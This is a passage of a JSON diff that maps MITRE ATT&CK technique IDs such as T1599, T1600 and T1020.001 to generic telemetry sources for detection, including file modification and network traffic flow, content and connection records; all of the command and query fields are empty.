This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1601.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1601.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1601", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1600.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1600.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1600", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1556.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1599.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1599", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1020.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
